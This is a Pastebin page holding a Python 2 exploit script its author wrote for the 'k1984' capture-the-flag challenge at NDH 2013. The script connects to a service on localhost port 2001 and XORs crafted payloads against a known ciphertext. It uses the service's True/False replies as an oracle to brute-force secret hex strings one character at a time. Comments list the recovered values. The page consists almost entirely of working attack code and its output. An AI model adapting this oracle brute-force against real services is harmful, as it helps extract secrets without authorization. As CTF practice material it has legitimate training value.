daily pastebin goal
76%
SHARE
TWEET

Untitled

a guest Jun 23rd, 2013 246 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2. # Exploit for k1984
  3. # Aris Adamantiadis (les pas contents)
  4. # unfortunately coded a few hours after the CTF was over :(
  5. # aris@kali64:~/ndh2013$ python xp.py
  6. # found 05:8efc22fcc45fc5901f1bbce521f29bc1
  7. # found 06:98adbaaef36e718f479db3b8dad331c9
  8. # found 13:7da8b66f82aeba067e33859583c4153f
  9. # found 17:083d5f3bcd7c0b39e473844f1326decf
  10. # found 20:3856bd0cbb94460c113259b0b83d9049
  11. # found 35:167f0dbb43c6430cd2d3b4e8f79dd769
  12. # found 46:840c653d087e8e1821b1903f0981ae2d
  13. # found 52:3f45067f05fb180b8f0014a23648d677
  14. # found 64:e17cc98f772d417a3ce261df512c2ab4
  15. # found 99:2385ba276005a5e2098c0acb9bdf8f07
  16.  
  17.  
  18. import socket
  19.  
  20. crypted = "8f d9 4d 70 a9 ce 04 bb 7b a9 7f dd 63 2d 23 8e" + \
  21. "52 bc dc 0b ab 8b d9 f0 f7 05 5e 60 84 e7 63 47" + \
  22. "fe c2 ce 99 10 c7 aa cc ac 65 b2 c8 f8 c3 6e e0" + \
  23. "d9 cd aa a3 f6 57 17 31 52 a6 58 0b 46 8f 91 e9" + \
  24. "11 20 c1 38 4e c4 21 0c 56 4c 77 32 e6 bf 80 bb" + \
  25. "d3 5c cc 9c d8 fc 1d 9e 44 a4 25 a8 5f cb fa 96"
  26. crypted = crypted.replace(" ","").decode("hex")
  27. def xor_strings(xs, ys):
  28.     return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(xs, ys))
  29.  
  30. offset = 65
  31. s=socket.socket(socket.AF_INET,socket.SOCK_STREAM,0)
  32. s.connect(("127.0.0.1",2001))
  33.  
  34. def try_pass(offset, string):
  35.         payload = chr(0x9C /2) + chr(0x10/4) + chr(0x40/8) + chr(0xa0 / 16) +\
  36.                 chr(ord('0') + offset/10) + chr(ord('0') + offset % 10) + chr(0xd0 / 8) +\
  37.                 string + "\x00"
  38.         s.send(xor_strings(payload,crypted))
  39.         x = s.recv(256)
  40.         #print "recv:" + x
  41.         if(x.find("True")!= -1):
  42.                 return True
  43.         else:
  44.                 return False
  45.  
  46. for offset in xrange(100):
  47.         string = ""
  48.         for i in xrange(32):
  49.                 if (i>0 and len(string)==0):
  50.                         break;
  51.                 for c in xrange(16):
  52.                         x = try_pass(offset, string + "%x"%c)
  53.                         if x:
  54.                                 string += "%x"%c
  55.                                 #print string
  56.                                 break
  57.         if(len(string) > 0):
  58.                 print "found %.2d:"%offset + string
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top